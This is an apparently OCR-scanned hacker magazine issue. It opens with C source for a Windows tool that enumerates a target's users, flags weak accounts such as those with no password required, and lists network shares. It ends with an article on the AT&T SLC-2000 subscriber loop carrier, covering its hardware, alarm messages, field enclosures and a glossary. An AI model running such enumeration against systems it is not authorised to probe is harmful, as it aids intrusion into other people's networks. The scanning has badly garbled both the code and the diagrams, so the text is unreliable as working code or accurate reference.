wprintf(L"\ngetting userlist from %s...\n" 
nas = NetUserEnum(utarg, 0, 0, buf, maxlen, 
if(nas != NERR_Success) { 
fprintf(stderr, "couldnt enum users, "); 


handle_error (nas) ; 
goto cleanup; 


} 


cc = sizeof (USER_INFO_0) * entread; 
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if( (usrs = (USER_INFO_O *)malloc(cc)) == NULL) { 
fprintf(stderr, "malloc probs\n") ; 
goto cleanup; 


} 


memcpy (usrs, *buf, cc); 
for(i = 0; i < entread; itt) { 
wescpy (user, usrs[i].usri0_name) ; 
wprintf(L"%ss\n", user); 
if (VERB) 
get_usr_info(utarg) ; 


} 


cleanup: 
if (buf) 
free (buf); 


return 0; 


} 


/* 
* get_user_info() 
* attempt to gather some interesting facts about 
a a user 
*/ 


void get_usr_info(LPWSTR utarg) 
{ 


NET_API_STATUS nas; 

USER_INFO_1 usrinfos; 

LPBYTE *buf = NULL; 

if( ! (buf = (LPBYTE *)malloc(sizeof (USER_INFO_1))) ) 


bail ("malloc probs\n"); 
nas = NetUserGetInfo(utarg, user, 1, buf); 


if (nas) { 
fwprintf (stderr, L"couldnt get user info for for %s, ", user); 
handle_error (nas); 

} 

else{ 
memcpy (&usrinfos, *buf, sizeof (USER_INFO_1)); 


/* most of these will never happen, but nothings lost trying */ 


if( (UF_PASSWD_NOTREQD & usrinfos.usril_flags) ) 
printf ("\t-password not required, how about that.\n"); 

i1f( (UF_ACCOUNTDISABLE & usrinfos.usril_flags) ) 
printf("\t-account disabled\n"); 

i1f( (UF_LOCKOUT & usrinfos.usril_flags) ) 
printf("\t-account locked out\n"); 

if( (UF_DONT_EXPIRE_PASSWD & usrinfos.usril_flags) ) 


F 
t 
F 
E 
F 
printf ("\t-password doesnt expire\n"); 
if( (UF_PASSWD_CANT_CHANGE & usrinfos.usril_flags) ) 
t 
F 
t 
E 
t 
F 


printf ("\t-user cant change password\n"); 

if( (UF_WORKSTATION_TRUST_ACCOUNT & usrinfos.usril_flags) ) 
prin ("\t-account for some other box in this domain\n"); 
if( (U 
prin 
if( (U 
print 


__SERVER_TRUST_ACCOUNT & usrinfos.usril_flags) ) 
F("\t-account for what is prolly the BDC\n"); 
rT 
( 


NTERDOMAIN_TRUST_ACCOUNT & usrinfos.usril_flags) ) 
"\t-interdomain permit to trust account\n"); 


Gl 


f 


free (buf); 
} 


/* 
* procure_sharelist () 
* strangely enough, this retrieves a sharelist from target 
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int procure_sharelist () 
{ 
DWORD Cj 
DWORD bufsize = 16384, cnt = OxFFFFFFFF; 
HANDL enhan; 
void *buf; 
NETRESOURCE *res; 
u_int i; 


A 


if( (buf = malloc(bufsize)) == NULL) { 
fprintf(stderr, "malloc probs, bailing\n"); 
return -1; 


nr.dwScope = RESOURCE_CONNECTED; 
nr.dwType = RESOURCETYPE_ANY; 
nxr.dwDisplayType = 0; 

nr.dwUsage = RESOURCEUSAGE_CONTAINER; 
nr.lpLocalName = NULL; 

nr.lpRemoteName = (LPTSTR)target; 

nr.lpComment = NULL; 

nr. lpProvider = NULL; 

r = WNetOpenEnum (RESOURCE_GLOBALNET, RESOURCETYPE_ANY, 


7 


RESOURCEUSAGE_ CONNECTABLE, é&nr 


zr 


, &enhan); 
if(r != 0){ 
free (buf); 
printf ("open_enum failed, sorry- "); 
handle_error(r); 
return -1; 


r = WNetEnumResource(enhan, &cnt, buf, &bufsize); 


LE (ie P= QO) 
free (buf); 
printf("enum_res failed- "); 
handle_error(r); 
return -1; 
} 
res = (NETRESOURCE*)malloc(cnt * sizeof (NETRESOURCE) ); 
if (res == NULL) { 


free (buf); 
printf("malloc probs, i wont be listing shares.\n"); 
return -1; 


} 


memcpy (res, buf, (cnt * sizeof (NETRESOURCE)) ); 
for(i = 0; i < cnt; itt) { 
if (VERB) 


printf("\nshare name:\t"); 


printf("%s\n", res[i].lpRemoteName) ; 
if (VERB) { 


printf ("share type:\t"); 
if(res[i].dwType = RESOURCETYPE_DISK) 
printf ("disk"); 


else 
printf ("printer"); 
printf ("\ncomment:\t%s\n", res[i].lpComment) ; 


} 


free (buf); 
free (res); 
return 0; 
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/* 
* close_session() 
* clean up our mess 
*/ 


int close_session() 


{ 
DWORD vc; 


WSACleanup () ; 
if (!OPT_NODEL) 
r = WNetCancelConnection2 (target, 0, TRUE); 


if(r != O){ 
fprintf(stderr, "couldnt delete %s, returned d\n", target, r); 
return -1; 

} 

else{ 
iff (VERB) 


printf ("connection to %s deleted\n", target); 


} 


return 0; 


} 


/* 
* handle_error () 
* util function to deal with some errors. 
Ky 

void handle_error(DWORD err) 


{ 


switch (err) { 
case ERROR_ACCESS_DENIE 
fprintf(stderr, "access is denied.\n"); 
break; 
case ERROR_BAD_ NET _NAME: 
fprintf(stderr, "bad net name.\n"); 
break; 
case ERROR_EXTENDED_ ERROR: 
fprintf(stderr, "an extended error occurred.\n"); 
break; 
case ERROR_INVALID_ PASSWORD: 
fprintf(stderr, "invalid password.\n"); 
break; 
case ERROR_LOGON_FAILURE: 
fprintf(stderr, "bad username or password.\n"); 
break; 
case NO_ERROR 
fprintf(stderr, "it worked\n"); 
break; 
case ERROR_BAD_ NETPATH: 


fprintf(stderr, "network path not found.\n"); 


break; 
default: 
fprintf(stderr, "a random error occurred (%d).\n", err); 
} 
} 
/* 
* prepend_str () 
* util funk to prepend chars to a string 
*/ 
void prepend_str(char *orgstr, char *addthis) 
{ 
orgstr = _strrev(orgstr); 
addthis = _strrev(addthis) ; 


streat(orgstr, addthis); 


3da\n", VERB); 


printf ("verbosity = 


} 


/* 
* powerup () 
* just init stuff and parse the command line 
*/ 


int powerup(int argc, char **argv) 
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orgstr = _strrev(orgstr); 
} 
/* 
* parse_cl() 
o try and make sense of the command line. no, i dont have a win32 getopt. 
cat yes, i know i should 
*/ 
void parse_cl(int argc, char **argv) 
{ 
int dt, "CGi; 
char opt; 
DWORD vj 
OPT_SHARES = OPT_USERS = VERB = 0; 
for(i = 1; i < (argc); i++) { 
if( (*argv[i]) == ’-’){ 
opt = *(argv[i]+l1); 
switch (opt) { 
case ’a’: 
OPT_SHARES = 1; 
OPT_USERS = 1; 
break; 
case ’s’ 
OPT_SHARES = 1; 
break; 
case 'u’: 
OPT_USERS = 1; 
break; 
case 'g’: 
OPT_GETUI = 1; 
if( (strlen(argv[it+1])) > USER_LEN) 
bail("username too long (must be < 21)"); 
ZeroMemory (user, USER_LEN) ; 
cc = strlen(argv[++1i]); 
r = MultiByteToWideChar(CP_ACP, 0, argv[i], cc, user, 
2))3 
break; 
case 'd’: 
OPT_NODEL = 1; 
break; 
case 'v’ 
VERB++; 
break; 
default: 
if( (opt != 'h’) && (opt != '?"7) ) 
fprintf(stderr, "unknown option ’%c’\n", opt); 
usage (argv[0]); 
break; 
} 
} 
} 
if( (OPT_SHARES) && (VERB) ) 
printf("listing shares\n"); 
if( (OPT_USERS) && (VERB) ) 
printf ("listing users\n"); 
if( (OPT_GETUI) && (VERB) ) 
wperintf(L"getting infos about user %s\n", user); 
if (VERB) 


(cc + 
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{ 


struct hostent *hent; 
u_long addie; 

WORD werd; 

WSADATA data; 

char buf [256]; 

int cc = 0, ucc = 0; 


if(arge < 3) 
usage (argv[0]); 


parse_cl(argc, argv); 
ZeroMemory (buf, 256); 
strcpy (buf, argv[arge - 1]); 


/* if not unc format get the ip */ 


if(buf[O] != “\\"){ 


if (VERB > 1) 


printf ("target not in unc\n"); 


werd = MAKEWORD(1, 1); 
if( (WSAStartup(werd, édata)) !=0 ) 


bail ("couldnt init winsock\n"); 


hent = (struct hostent *)malloc(sizeof (struct hostent)); 


if (hent == NULL) 


bail ("malloc probs\n"); 


if( (addie = inet_addr(buf)) == INADDR_NONE) { 


} 
prepend_str (buf, 
} 
else 
fprintf(stderr, 


hent = gethostbyname (buf) ; 

if (hent == NULL) { 
fprintf(stderr, "fatal: couldnt resolve %s.\n", buf); 
return —-1; 

} 

ZeroMemory (buf, 256); 

strepy (buf, inet_ntoa(* (struct in_addr *) *hent->h_addr_list)); 


HALAS 


"target already in unc\n"); 


if( (strlen(buf) > (TARG_LEN - 1)) ){ 
free (buf); 
bail("hostname too long (must be < 255 chars.)"); 
return -1; 

} 

ZeroMemory (target, TARG_LEN); 


strcpy (target, buf) 


1’ 


ZeroMemory (utarg, TARG_LEN) ; 


cc = strlen(target) 


la 


ucc = MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, target, cc, utarg, cc); 


if(uce < 1){ 


bail ("unicode conversion probs, sorry"); 


return -1; 


} 


return 0; 


} 


void usage(char *prog) 
{ 
fprintf 
fprintf 
fprintf 
fprintf 


a ete ees ee 


stderr, "usage: %s [asug<username>hv] <target>\n", prog); 
stderr, "\t-s:\t\tget share list\n"); 

stderr, "\t-u:\t\tget user list\n"); 

stderr, "\t-g: <username>\tget infos about just <username>\n") ; 
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fprintf(stderr, "\t-d:\t\tleave connection established on exit\n"); 
fprintf(stderr, "\t-a:\t\t-s + -u\n"); 
fprintf(stderr, "\t-h, -?:\t\tdisplay this help\n"); 
fprintf(stderr, "\t-v:\t\tbe verbose (use twice to be garrolous)\n"); 
exit (0); 
} 
/* 
* bail () 
* just whine and die 
* / 


void bail(const char *msg) 

{ 
fprintf(stderr, "fatal: %s\n", msg); 
close_session(); 
exit(1); 

} 


<--> 


----[ EOF 
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[ The Subscriber Loop Carrier (slick) 


i ens [ Voyager [TNO] 
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Overview 
A Subscriber Loop Carrier (SLC) (often pronounced "slick") is a 


multiplexer which allows a large number of analog lines to be provided 
over a very small number of digital lines. A good example is the AT&T 
SLC 5, which allows 192 subscriber loops to be provided through two or 
four digital lines. SLCs are also referred to as Digital Loop Carriers 
(DLCs) . 


[The first SLC was installed in 1971. As of 1995, between 5 and 10% of 
all lines are served by SLCs, as are roughly 50% of all new lines built 
each year. SLCs are available from quite a few vendors. This article 
focuses on the extremely popular SLC-2000 from AT&T. 


A SLC usually consists of two separate subsystems, the Central Office 
Terminal (COT) and the Remote Terminal (RT). The COT is connected to 
the RT via a DS1 circuit. The DS1 circuit may be carried over actual Tl 
lines, or it may be carried over another medium such as lightwave or 
digital radio. The RT is then connected to the subscribers using a 
Voice Frequency (VF) circuit. The VF circuit is what you and I would 
recognize as our normal phone line. 


This diagram illustrates a subscriber loop constructed using an SLC: 


Central ee \ 
Office 


--- DS1 circuit --- RT --- VF circuit 


| Residenc 
(COT) | 


The Central Office Terminal 


The SLC-2000 COT is a modular design usually consisting of the following 
components: 
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Access Resource Manager (ARM) 


Metallic Distribution Assembly 


Heat Baffles 


Alarm and Test Unit (ATU) 
ee oe Cees ae ie a | fae 
| ee 
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The Remote Terminal 


The SLC-2000 RT is a modular 
components: 


Access Resource Manager (ARM) 


Metallic Distribution Assembly 
High Density Fiber Optics Shelf 


Cooling fans 


shelf 


(MDS) shelves 


Alarm and Test Unit 


Heat baffle 


Access Resource Manager (ARM) shelf 
Heat baffle 

Metallic Distribution Shelf (MDS) 
Metallic Distribution Shelf (MDS) 
Heat baffle 

Metallic Distribution Shelf (MDS) 
Metallic Distribution Shelf (MDS) 


design usually consisting of the following 


shelf 
(MDS) shelves 
(HDOS) shelves (FITL only) 


An SLC-2000 RT configured for a Metallic Application 


| SoSessee 

PIT TT ET EE EEE E PPP bbtttre 
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Access Resource Manager 


(ARM) shelf 


lic Distribution Shelf 


(MDS) 


lic Distribution Shelf (MDS) 


Us ee ee ee ci ne 
Viledobol AU Tales en pe Pete d det de vat -S-SS5- Metallic Distribution Shelf (MDS) 
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LFS SC ae a cad Da <------- Metallic Distribution Shelf (MDS) 
Lee aA Ree il A eee ee 
An SLC-2000 RT configured for a Fiber In The Loop (FITL) Application 
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SSS SS 223 Metallic Distribution Shelf (MDS) 
Le Sasoes Metallic Distribution Shelf (MDS) 
Sas Metallic Distribution Shelf (MDS) 
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SLC-2000 Shelves 


The SLC-2000 is divided into a number of shelves, each of which hold 
circuit cards that are responsible for specific functions within the 
SLC. Some shelves are found only in COTs, others are found only in 
RTs, while most shelves are used in both COTs and RTs. 


Access Resource Manager (ARM) Shelf 


The ARM shelf provides feeder interface, bandwidth management and 
circuit maintenance features. 


The ARM shelf consists of the following functional component groups: 


User Interface Panel (UIP) 

Integrated Test Head (ITH) 
Provisioning Display Controller (PDC) 
Bandwidth Management Complex 
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DS1 distribution 
DS1/VT feeder interfaces 
SONET feeder 


The following diagram illustrates the functional components of an ARM shelf: 


/<-- ESD ground jack 

/<-- Power Converter Unit 

/<-- Transmission Signaling Unit 

/<-- Analog Measurement Unit 

/<-- Power Amplifier Unit 

| /<-- Craft Access Unit 

| /<-- System Memory Unit 

| /<-- Provisioning and Display Controller 
| /<-- Link to Alarm and Networks 
| | | /<-- DS1 interfaces 

| | | | 


P|T A|P|C|S|P L|D|D|D|D|D|D|D|D 
CIS M|A|A|M|D AIS|IS|IS/|S|IS|S|S/S 
U|U U|U|U|UI|C NJ1/1/1]/1]1]1]1]/1 
<-\ 
/-> | 
| | 
| |-\ 
{=| | 
| one) | 
| one) | 
\-> >-/ 
bode a IS als ol | | 
Wf AN FOL | \-- Test Head Controller (THC) 
| \ / \-- System Controller (SYSCTL) 
| | \-- Overhead Controller (OHCTL) 
| \-- STS-1 Multiplexer (MXRVO) 
\--- Optical Line Interface Unit (OLIU) 
\-- Synchronous Timing Generator (TGS) 


Bandwidth Management Complex --/ 


The User Interface Panel (UIP) represents the highest level of 
interaction possible with the SLC-2000 without plugging some other 


piece of equipment into it. Here is a close-up of the User Interfac 
Panel: 
Abnormal -->\ 
AMD (Alphanumeric Message Display) -->\ NE Activity >--\ 
Attention -->\ | Major -—->\ 
Panel Fault -—->\ | | Critical -->\ 
/<-- ESD ground jack | 
| | | 
Mere tA ig ee | 
O | / | |/ |* User Int. Panel | / |/ / / 
| [Agee hy yO a ae an 
| = = 000 #### ## criss: | |/ vo # # # OF / \/ / is 
IL} Tl | I TET | Loot | | 
bl \I/ | be las S10 | a | 


11.txt Wed Apr 26 09:43:42 2017 5 


Miles tl | | 
| | | | 
Fuses-—>/ | | | 
Power test | | | 
points -->/ | | 
CIT connector -->/ | 
DDS clock conn. -->/ 
DDS Maintenance Jack -->/ 
DSO Maintenance Jack -->/ 
DS1 Maintenance Jack -->/ 
T-R Maintenance Jack -->/ 
T1-R1 Maintenance Jack -->/ 
E&M Maintenance Jack -->/ 
Power -->/ 
Scroll Buttons ->/ 
Enter -—->/ 
Escape -——>/ 
LED Test -->/ 
ACO -->/ 
Update -->/ 
Minor -->/ 
Power Minor ->/ 
FE Activity -->/ 
Session -->/ 
There are many connections on the UIP. he Electrostatic Discharge 
(ESD) ground jack is for a static control wrist strap. The Craft 
Interface Terminal (CIT) connector is a DB-25 for plugging in a CIT ora 


PC running terminal emulation software. The DDS cl 


provides a clock source for test sets. 
to monitor the -48v power to the unit. 


There are many LED’s on the UIP. The Attention LI 


[The Power 


lock connector 


Test Points allow you 


ED is yellow when the 


there is something new on the Alphanumeric Message Display 


Panel Fault LED is red when the UIP is in need of repair. 


is green when —48v power is present. The Power Minor LI 


(AMD). The 
The Power LED 


ED is yellow when 


the system is operating on battery power. The Alarm Cut Off (ACO) LED is 
green when the ACO button has been pressed during an alarm. The 
Critical LED is red when a failure has caused a loss of service for 128 
or more customers. The Major LED is red when a failure has caused a 


ome alarm condition. The Far End (FE) Activity LI 


loss of service for 24 or more customers. The Minor Li 


ED is yellow when 


ocal 


te 


an error exists, but is not causing a loss of service to any customers. 
he Near End (NE) Activity LED is yellow when the 1] 


rminal has 


ED is yellow when the 


ode. 
he remote terminal. 


(AMD) and the buttons associated with its use. 


<Escape> keys work just as you might imagine. 


s 

remote terminal has some alarm condition. The Abnormal 
when the SLC-2000 is not in a mode that provides service, 
m 

t 


LE 


D is yellow 


[The Session LED is yellow when a technician has a CIT 


such as a test 
[ connected to 


The most interesting part of the UIP is the Alphanumeric Message Display 


The AMD displays a 
single 24 character line of text. The scroll buttons may be pushed to 
move forward and backward through various menu choices. 


Three types of messages appear on the User Interface Pan 


Automatic Messages 
Fault Messages 
Alarm Messages 


he <Enter> and 


(UIP): 


Automatic Messages are triggered by pressing certain buttons, 
UIP or PDC unavailability, and SYSCTL installation. 
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Fault Messages are displayed when the RETRIEVE-FAULTS command is 
selected on the UIP. 


Alarm Messages are displayed when the RETRIEVE-ALARMS command is 
selected on the UIP. 


The Automatic Messages are: 


PANEL FAULT 
MN:NE:pdc unavail 


UPDATE: In-Progress 

UPDATE: done 

SONET SUBSYS UPDATE done 

SYSCTL INITIALIZATION 

SYSC EXTENDED INITZN 

SYSCTL EXTND INITZN done 

STATUS -LOCAL SONET 

STATUS -LOCAL SONET SITE 

STATUS -REMOTE SITE 1 

STATUS -REMOTE SITE 2 

STATUS -REMOTE SITE 3 

STATUS -REMOTE SITE 4 

STATUS -REMOTE SITE 5 

STATUS -REMOTE SITE 6 

STATUS -REMOTE SITE 7 

STATUS -REMOTE SITE 8 
"PANEL FAULT" indicates that the User Interface Panel (UIP) has 
failed and is unable to communicate with the Provisioning 
Display Controller (PDC). 


"MN:NE:pdc unavail" indicates that the Provisioning Display 
Controller (PDC) is unable to communicate with the User 
Interface Panel (UIP) because it has failed, or because software 
installation on the PDC is in progress. 


"UPDATE: In-Progress" indicates that the UPDATE button has been 
pressed and that an update is in progress. (See "Update button" 
below.) 


"UPDATE: done" indicates that an Update has been completed in 


= 


response to the use of the UPDATE button. 


"SONET SUBSYS UPDATE done" indicates that an Update has been 
completed in the SONET subsystem in response to the use of the 
UPD/INIT button on the SYSCTL. 


"SYSCTL INITIALIZATION" appears for 10 seconds after a SYSCTL 
with working software has been inserted. If the UPD/INIT button 
on the SYSCTL is pressed while this message is displayed, the 


SYSCTL will reset all SONET parameters to their factory 
defaults. 
"SYSCTL EXTENDED INITZN" appears after SYSCTL INITIALIZATION has 


been completed. 


"SYSCTL EXTND INITZN done" appears after SYSCTL EXTND INITZN has 
been completed. 


"STATUS -LOCAL SONET" indicates the User Interface Panel (UIP) 
indicators reflect the alarm status of the local system only. 
The letter "L" is displayed in the SYSCTL 7-segment display. 

This occurs when the user toggles the Far-End Select (FE SEL) 
button on the SYSCTL. 


"STATUS -LOCAL SONET SITE" indicates the User Interface Panel 
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(UIP) indicators reflect the combined alarm status of all the 
SONET network elements at the local site. The SITE ID anda ’.’ 
is displayed in the SYSCTL 7-segment display. This occurs when 
the user toggles the Far-End Select (FE SEL) button on the 
SYSCTL. 


"STATUS -REMOTE SITE x" indicates the User Interface Panel (UIP) 
indicators reflect the alarm status of REMOTE SITE x. The 
number "x" is displayed in the SYSCTL 7-segment display. This 
occurs when the user toggles the Far-End Select (FE SEL) button 
on the SYSCTL. 


There are several other miscellaneous buttons on the UIP. The LED Test 
button lights up all of the LED’s to allow quick identification of burnt 
out LED’s. The Alarm Cut Off (ACO) button shuts off the current alarm 
condition. The Update button operates much like the "Detect New 
Hardware" icon in Windows95, except that on the SLC-2000 it never locks 
up your system. 


Metallic Distribution Shelf (MDS) 


The MDS provides control and distribution for Data Service 0 (DSO) and 
Fiber In The Loop (FITL) interfaces. 


The following diagram roughly illustrates an MDS shelf assembly ina 
metallic configuration: 


* AT& # # ## # ## # Metallic Distribution Shelf 

: * * * 5 

: a * : 

; ; 3 
| | | | | | | | | | | | | | | | | | | | | | | | 
8 cf eV e-POD ea Pseo-fobf- M k-foc W bt De Pa Ea 

* * 
* * 

. * * . 
| | | | | | | | | | | | | | | | | | | | | | | | 
Loe ee ESP TSE | efoto [SE [eta Tes Lee SE Teh: LATE TALS [tee Let ats Ist | ef [otey [SE | 


MDS upper and lower shelves are numbered from bottom to top. On the 
left and right side of each shelf half are 12 channel units (only 9 are 
pictured in the ASCII diagram). In the middle of each shelf half are 
the common units. 


The following diagram roughly illustrates an MDS shelf assembly ina 
Fiber In The Loop (FITL) configuration: 


* AT&T if ## ## ## ## Metallic Distribution Shelf 


AT&T|ATET|ATET|ATET TT YET NPE NTN" |" |ATETIATETIATET/ATET| 


ee 

- |* [s [se [rari Foes | iit f Saale ee [* [* | 

i |* [* Le he Pal ee US. Ebel Sele LF Ties eg 
|| | 


% [* |* [3 Me te ee ls [ "* | 


* * * * * x|* * * * 
| | | | | | | | Il Tt tb th tb tl vl | | | | | | 
| | | | | | | | De ee a OF | | | | | | 
AT&T|ATE&T|ATET|ATET SEER TPE | eS" ATET|ATET|ATET|ATET 
* * * * * * zx |* * * * 
* * * * * xk|* * * * 
* * * * * * * * 
* * * * * zx|* * * * 
| | | | | | | | Il Tt tb tb tb tl vl | | | | | | 
| | | | | | | | A Pies Wg | | | | | | 
High Density Fiber Optics Shelf (HDOS) 
The HDOS interfaces between th lectrical signals on the MDSs and 


optical signals on the Multi-Services Distant Terminals (MSDTs). 


The following diagram roughly illustrates an HDOS assembly: 
ae te | ES TO AT Gale Po ao i Te, [cee a oe ees ees eee Se AE 
OU | OU | OU|0U OU | OU |OU|0U OU | OU | OU|0U OU | OU |OU|0U 
| | | | | | | | | | | | | | | | | | | | 
| | | | |PCU| | | | | |PCU| | | | | |PCU| | | | | |PCU| 
1 AMP FUSES > 


Note: An HDOS contains 8 Optical Unit (OU) / Power Conversion Unit (PCU) 
packs, not 4 as shown in the ASCII diagram. 


The ATU panel reports alarms and trouble indicators using audible 
alarms, visual indicators, and telemetry. In addition, the ATU provides 
interfaces to the Pair Gain Test Controller (PGTC) and DC bypass pair 
connections. 


An ATU panel looks roughly like this: 


Here is a close-up of the indicator lights on the far right end of the 
ATU: 


Fault ---> / / <-- Critical 
Busy ---> / / <-- Major 
Power Minor ---> HF fee <- Minor 
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Fan Units and Heat Baffles 


Fan units are used in RTs to provide cooling, while COTs use heat 


baffles for the same purpose. 


The fan unit looks in an RT looks something like this: 


A close-up of the far left end of the fan unit looks like this: 


*ATE&T fe) 
FAULT * CHANGE 
FAN 
SPEED 
LED O (10 MIN 
TEST TIMEOUT) 
LO——= “s.212 
+ O 8 - - 176 
6a coe TAO 
TEMP 4 - - 104 
2° = 68 
= 20 0 - - 32 
V oF 
c=10 * V 
ESD fe) 
ORD O 


Where might you find an RT? 


RTs are found in quite an interesting variety of enclosures, 


metal and cast concrete. Some are only 
while others ar nvironmentally controll 


large enough to hold the RT 


including 


led and large enough to hol 


equipment and several working technicians. 


44A + 44B Cabinets 
WP-91071 Cabinet 
51A cabinet 


80D Cabinet (Community Service 
80E Cabinet (Community Service 
Mini hut 
Maxi hut 


Concrete hut 


Vault) 
Vault) 


v 
ld the 
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Controlled Environment Vault (CEV) 


The 44A Cabinet is a wall mounted cabinet that requires a 44B Cabinet 
to house the powering equipment. 


WP-91071 Cabinet is a stand alone cabinet. 


The 51A cabinet is 48" high by 29" wide by 20.5" deep. The 51A cabinet 
consists of three sections: the front door, the electronics section, 
and the battery section. The front door is hinged on the left and 
opens to reveal th lectronics section. The electronics section is 
also hinged on the left, and opens to reveal the battery section. 


The 80D Cabinet (Community Service Vault). 


The 80E Cabinet (Community Service Vault). 


he Mini hut is a prefabricated 6’ by 10’ by 8’ high enclosure. 


The Maxi hut, also known as the Electronic Equipment Enclosure (EEE) is 
a prefabricated 10’ by 20’ by 8’ high environmentally controlled 
enclosure. 


The Concrete Hut is 13’ 2" by 7’ 7 and 8’ 8.5" high. The walls of the 
Concrete Hut are made of precast concrete and are 4" thick. The inside 
of the Concrete Hut is ventilated, heated and air conditioned. The 
Concrete Hut is protected by intrusion alarms, smoke alarms, and high 
temperature alarms. 


he Controlled Environment Vault (CEV) is a precast concrete enclosure 
esigned for installation below ground. The CEV is cast in three parts: 
he bottom half, the top half, and the entrance hatch. The entrance to 
CEV shows a ladder leading down into the enclosure. The CEV is the 
ltimate in environmental control. In addition to ventilation, heating 
nd optional air conditioning, the CEV also features a gas monitor that 
enses explosive and toxic gasses, a dehumidifier, and a sump pump. The 
EV is lit by four fluorescent lamps backed up by an emergency lamp. The 
EV is protected by a gas alarm, a high temperature alarm, a 
igh-humidity alarm, a power-loss alarm, a high-water alarm and an 
ntrusion alarm. 


BPOTAQAQANnAG At AH 


Enclosure Systems Dual Channel Banks Lines 
44A+44B Cabinets 2 af 192 
WP-91071 Cabinet 4 2 394 

51A Cabinet 2 dl 192 

80D Cabinet 4 2 384 

80E Cabinet 8 4 768 
Concrete Hut 32 (36) 16(18) 3072 (3456) 
CEV (167) 40 (44) 20 (22) 3840 (4224) 
CEV (24’) 60 (78) 30 (39) 5760 (7488) 
EEE 72 (78) 36 (29) 6912 (7488) 


Note: Number in parenthesis are applicable only to systems using bulk power. 


SLC Interface Software 
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SLC Glossary 


A&M Addition and Maintenance 

ACO Alarm Cut Off 

ACU Alarm Control Unit 

ACXT Apparatus Case Crosstalk 

ADPCM Adaptive Differential Pulse Code Modulation 
ADU Alarm Display Unit 

ALU Alarm Interface Unit 

ALBO Automatic Line Build Out 

ALC Automatic Loss Compensation 

ALIT Automatic Line Insulation Test 

AMD Alphanumeric Message Display 

ANI Automatic Number Identification 

ASN Abstract Syntax Notation 

ASU Alarm Suppressor Unit 

ATU Alarm and Test Unit 

AWC Average Worst Case 

B-E Both-Ends 

B8ZS Bipolar with 8 Zero Substitution 

BCU Bank Controller Unit 

BFU Bank Fuse Unit 

BIU Backplane Interface Unit, Bank Interface Unit 
BMP Bandwidth Management Processor 

CAU Craft Access Unit, Channel Access Unit 


CECLTT International Telephone and Telegraph Consultative Committee 
CCS Hundred Call Seconds 


CDO Community Dial Office 

CDS Circuit Design System 

CENTREX Central Office Exchange Service 

CEV Controlled Environment Vault 

CFU Channel Fuse Unit 

CIMAP Circuit Installation and Maintenance Package 
CIR Customer Information Release 

CIT Craft Interface Terminal 

C1IU Craft Interface Unit 

CLC Common Language Coordinator 

CLE Common Language Equipment Identification 
CLF Carrier Line Failure 

CLLI Common Language Location Identification 
CLRC Circuit Layout Record Card 

CMC Construction Management Center 

CMIS Common Management Information System 

CND Calling Number Delivery 

CO Central Office 

COACH Customized On-line Aid for Customer Help 
CODEC Coder/Decoder 

COE Central Office Engineer 

COT Central Office Terminal 

CP Circuit Pack 

CPC Circuit Provisioning Center 

CPL Circuit Party Identification 

CRC Cyclic Redundancy Check, Circuit Redundancy Code 
CSA Carrier Serving Area 

CSC Community Service Cabinet 

CSDC Circuit Switched Digital Capability 
CSPEC Common Systems Planning and Engineering Center 
CSS Controlled Slip Second 

CTB Cut Through Board 

CTU Channel Test Unit 

CU Channel Unit 

CUE Channel Unit Emulator 


CV Coding Violation 
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CWG Construction Work Group 

CZ Carrier Zone 

DA Distribution Area 

DACS Digital Access Cross-connect System 
DCC Data Communications Channel 

DCLU Digital Carrier Line Unit 

DCU Digital Connectivity Units 

DDF Digital Digroup Formatter 

DDS Digital Data Service 

DF Distributing Frame 

DEI Digital Facilities Interface 

DID Direct Inward Dial 

DILEP Digital Line Engineering Program 
DLC Digital Loop Carrier 

DLI Data Link Interface 

DLP Detailed Level Procedure 

DLR Design Layout Record 

DLS Digital Line Schematic 

DLU Data Link Unit 

DM Degraded Minute 

DPO Dial Pulse Originating 

DPT Dial Pulse Terminating 

DPX DATAPATH Extension 

DR Demand Repeater 

DSO Digital Signal 0, Data Service 0 
DSODP Digital Signal 0 Dataport 

DS1 Digital Signal 1 (1.544 MB/s) 

DSDC Distribution Services Design Center 
DSL Digital Subscriber Line 

DSNE Directory Services Network Element 
DSPC Distribution Services Planning Center 
DST Digital Signal Translator 

DSU Data Service Unit 

DSX Digital Service Cross-connect 

DT Distant Terminal 

DTU Digital Test Unit 

E Bar 

EASOP Economic Alternative Selection for Outside Plant 
ECCR Exchange Customer Cable Record 

EEC Electronic Equipment Enclosure 

EE Equipment Engineering Center 

EFPA Enhanced Feature Package A 

EFPB Enhanced Feature Package B 

EFPC Enhanced Feature Package C 

EFPD Enhanced Feature Package D 

EF RAP Exchange Feeder Route Analysis Program 
EJO Engineering Job Order 

ELIU Electrical Line Interface Unit 

EMO Expected Measured Loss 

EOC Embedded Operations Channel 

ES Errored Seconds 

ESD ElectroStatic Discharge 

ESF Extended Super Frame 

ESPORTS Extended Super POTS 

EWC Extreme Worst Case 

EWO Engineering Work Order 

FA Feeder Administration 

FAC Facility Assignment and Control Center 
FACS Facility Assignment and Control System 
FAP Facility Analysis Plan 

FCS Frame Checking Sequence 

FCU Fan Control Unit 

FDI Feeder Distribution Interface 

FDL Facility Data Link 

FE Far End 

FELP Far End LooP 

FEMF Foreign Potential 

FEXT Far End Crosstalk 
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FITL Fiber In The Loop 

FL Fault Locating 

FLTA Fault Locate Test Adapter 

FPA Feature Package A 

FPB Feature Package B 

FPC Feature Package C 

FPD Feature Package D 

FPS Framing Pattern Sequence 

FSM Fiber Service Module 

FSR Frequency Selective Ringing 

FSS Fiber Service Shelf 

FTTH Fiber To The Home 

FX Foreign Exchange 

FXO Foreign Exchange Office 

FXS Foreign Exchange Station 

GNE Gateway Network Element 

GS Ground Start 

HDIC High Density Interconnect 

HDOS High Density Optics Shelf 

HDT Host Digital Terminal 

HTR Heater 

IBN Integrated Business Network 
IDCU Integrated Digital Carrier Unit 
IDF Intermediate Distributing Frame 
INA Integrated Network Access 

IOP Input/Output Processor 

ISD Tsolation Diagram 

ISDN Integrated Services Digital Network 
ISLU Integrated Services Line Unit 
ITH Integral Test Head 

LAC Loop Assignment Center 

LAN Link to Alarm and Networks 

LBO Line Build Out 

LBRV Low Bit Rate Voice 

LCRIS Loop Cable Record Inventory System 
LDS xocal Digital Switch 

LDU Load Distribution Unit 

EC oop Electronic Coordinator 

.ED ight Emitting Diode 

LFACS Loop Facility Assignment and Control System 
LFC Line Feeder Converter 

LFU Line Fuse Unit 

LIC Lightguide Interconnect Cable 
LIT Line Insulation Test 

LIU Line Interface Unit 

LM Loop Multiplexer 

LMOS Loop Maintenance Operating System 
LOF Loss Of Frame 

LOS Loss Of Second 

LP Low Power 

LRAP Long Route Analysis Program 

